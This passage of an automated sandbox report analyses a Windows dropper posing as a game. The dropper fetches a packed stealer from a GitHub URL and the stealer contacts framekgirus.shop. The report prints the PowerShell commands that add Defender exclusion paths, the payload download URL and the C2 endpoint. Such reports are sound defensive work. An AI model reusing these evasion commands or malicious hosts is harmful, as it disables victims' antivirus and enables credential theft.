                Source: jyidkjkfhjawd.exe, 00000007.00000003.1877860418.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1878598429.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1835084854.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000002.2035303322.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2010143027.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2000292819.00000000013BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop:443/api
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1877860418.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1878598429.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000002.2035303322.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2010143027.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2000292819.00000000013BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop:443/apiD
                Source: jyidkjkfhjawd.exe, 00000007.00000002.2035303322.00000000013BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop:443/apin.txtPK
                Source: jyidkjkfhjawd.exe, 00000007.00000002.2035303322.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2010143027.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2000292819.00000000013BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://framekgirus.shop:443/apitxtPK
                Source: eXbhgU9.exe, 00000000.00000002.1816600070.0000000002704000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
                Source: powershell.exe, 00000005.00000002.1728016132.0000000005035000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: eXbhgU9.exe, 00000000.00000002.1816600070.000000000269C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/jyidkjkfhjawd.exe
                Source: eXbhgU9.exeString found in binary or memory: https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/jyidkjkfhjawd.exe-Downloading
                Source: eXbhgU9.exe, 00000000.00000002.1816600070.000000000269C000.00000004.00000800.00020000.00000000.sdmp, ConDrv.0.drString found in binary or memory: https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/jyidkjkfhjawd.exe...
                Source: powershell.exe, 00000002.00000002.1705067078.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1737406894.0000000005F4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: eXbhgU9.exe, 00000000.00000002.1816600070.0000000002742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                Source: eXbhgU9.exe, 00000000.00000002.1816600070.0000000002742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/jyidkjkfhjawd.exe
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1838585655.0000000004335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1862690282.00000000045BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1862690282.00000000045BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1839032040.00000000042E7000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1838585655.0000000004333000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1849507128.00000000042E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1839032040.00000000042C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1839032040.00000000042E7000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1838585655.0000000004333000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1849507128.00000000042E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1839032040.00000000042C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1837628332.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1837848299.00000000042D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1837628332.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1837848299.00000000042D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1862690282.00000000045BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1862690282.00000000045BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1862690282.00000000045BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1862690282.00000000045BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1862690282.00000000045BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

                System Summary

                Source: jyidkjkfhjawd.exe.0.dr | Static PE information: section name:
                Source: jyidkjkfhjawd.exe.0.dr | Static PE information: section name:
                Source: jyidkjkfhjawd.exe.0.dr | Static PE information: section name:
                Source: jyidkjkfhjawd.exe.0.dr | Static PE information: section name:
                Source: jyidkjkfhjawd.exe.0.dr | Static PE information: section name:
                Source: eXbhgU9.exe, 00000000.00000002.1814080299.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs eXbhgU9.exe
                Source: eXbhgU9.exe, 00000000.00000000.1662025325.00000000003B6000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamegamee.exe, vs eXbhgU9.exe
                Source: eXbhgU9.exe | Binary or memory string: OriginalFilenamegamee.exe, vs eXbhgU9.exe
                Source: jyidkjkfhjawd.exe.0.dr | Static PE information: Section: ZLIB complexity 0.9981477744464945
                Source: jyidkjkfhjawd.exe.0.dr | Static PE information: Section: ZLIB complexity 0.99796875
                Source: jyidkjkfhjawd.exe.0.dr | Static PE information: Section: .data ZLIB complexity 0.9965319237854804
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@10/12@3/3
                Source: C:\Users\user\Desktop\eXbhgU9.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\eXbhgU9.exe.log
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7668:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0icvfcmw.a3t.ps1
                Source: eXbhgU9.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: eXbhgU9.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\eXbhgU9.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\eXbhgU9.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: jyidkjkfhjawd.exe, 00000007.00000003.1849551403.00000000042A8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: eXbhgU9.exe | ReversingLabs: Detection: 13%
                Source: eXbhgU9.exe | Virustotal: Detection: 22%
                Source: unknown | Process created: C:\Users\user\Desktop\eXbhgU9.exe "C:\Users\user\Desktop\eXbhgU9.exe"
                Source: C:\Users\user\Desktop\eXbhgU9.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\eXbhgU9.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\FkSpRTrp'
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\eXbhgU9.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\eXbhgU9.exe | Process created: C:\FkSpRTrp\jyidkjkfhjawd.exe "C:\FkSpRTrp\jyidkjkfhjawd.exe"
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\FkSpRTrp'Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exeProcess created: C:\FkSpRTrp\jyidkjkfhjawd.exe "C:\FkSpRTrp\jyidkjkfhjawd.exe" Jump to behavior
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: dhcpcsvc6.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: dhcpcsvc.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: rasapi32.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: rasman.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: rtutils.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: secur32.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: propsys.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: edputil.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: wintypes.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: appresolver.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: bcp47langs.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: slc.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: sppc.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\Desktop\eXbhgU9.exe Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Section loaded: apphelp.dll
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Section loaded: version.dll
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Section loaded: shfolder.dll
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Section loaded: uxtheme.dll
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Section loaded: windows.storage.dll
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Section loaded: wldp.dll
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Section loaded: profapi.dll
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Section loaded: sspicli.dll
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Section loaded: winhttp.dll
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Section loaded: webio.dll
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Section loaded: mswsock.dll
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Section loaded: iphlpapi.dll
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Section loaded: winnsi.dll
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Section loaded: dnsapi.dll
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Section loaded: rasadhlp.dll
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Section loaded: fwpuclnt.dll
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Section loaded: schannel.dll
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Section loaded: mskeyprotect.dll
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Section loaded: ntasn1.dll
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Section loaded: ncrypt.dll
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Section loaded: ncryptsslp.dll
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Section loaded: msasn1.dll
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Section loaded: cryptsp.dll
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Section loaded: rsaenh.dll
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Section loaded: cryptbase.dll
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Section loaded: gpapi.dll
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Section loaded: dpapi.dll
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Section loaded: kernel.appcore.dll
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Section loaded: wbemcomn.dll
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Section loaded: amsi.dll
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: eXbhgU9.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: eXbhgU9.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: eXbhgU9.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: C:\Users\Dan\source\repos\gamee\gamee\obj\Debug\gamee.pdb source: eXbhgU9.exe

                Data Obfuscation

                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Unpacked PE file: 7.2.jyidkjkfhjawd.exe.ab0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
                Source: eXbhgU9.exe Static PE information: 0xAAB116B5 [Thu Sep 30 01:13:25 2060 UTC]
                Source: jyidkjkfhjawd.exe.0.dr Static PE information: section name: (empty; reported for five nameless sections)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0444633D push eax; ret 2_2_04446351
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_04443CAA push 8BD08B6Eh; iretd 2_2_04443CB3
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_081273E8 push eax; retf 2_2_081273E9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_03366348 push eax; ret 5_2_03366351
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Code function: 7_2_00AEF000 push eax; mov dword ptr [esp], 5B5A5908h 7_2_00AEF005
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Code function: 7_2_00ABFE62 push 89FFFF80h; ret 7_2_00ABFE69
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Code function: 7_2_03223B9A push ebp; ret 7_2_03223BB6
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Code function: 7_2_03224676 push ecx; iretd 7_2_032246EB
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Code function: 7_2_0322452F push ecx; iretd 7_2_032246EB
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Code function: 7_2_032235B3 push ecx; iretd 7_2_032235BA
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Code function: 7_2_032235FF push ecx; iretd 7_2_03223606
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exe Code function: 7_2_03220077 push ds; retf 7_2_03220078
                Source: jyidkjkfhjawd.exe.0.dr Static PE information: section name: (nameless) entropy: 7.997518573935155
                Source: jyidkjkfhjawd.exe.0.dr Static PE information: section name: (nameless) entropy: 7.831462667091339
                Source: jyidkjkfhjawd.exe.0.dr Static PE information: section name: (nameless) entropy: 7.983042351633134
                Source: jyidkjkfhjawd.exe.0.dr Static PE information: section name: (nameless) entropy: 7.881268733146465
                Source: jyidkjkfhjawd.exe.0.dr Static PE information: section name: .data entropy: 7.981738077290403
                Source: C:\Users\user\Desktop\eXbhgU9.exe File created: C:\FkSpRTrp\jyidkjkfhjawd.exe

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
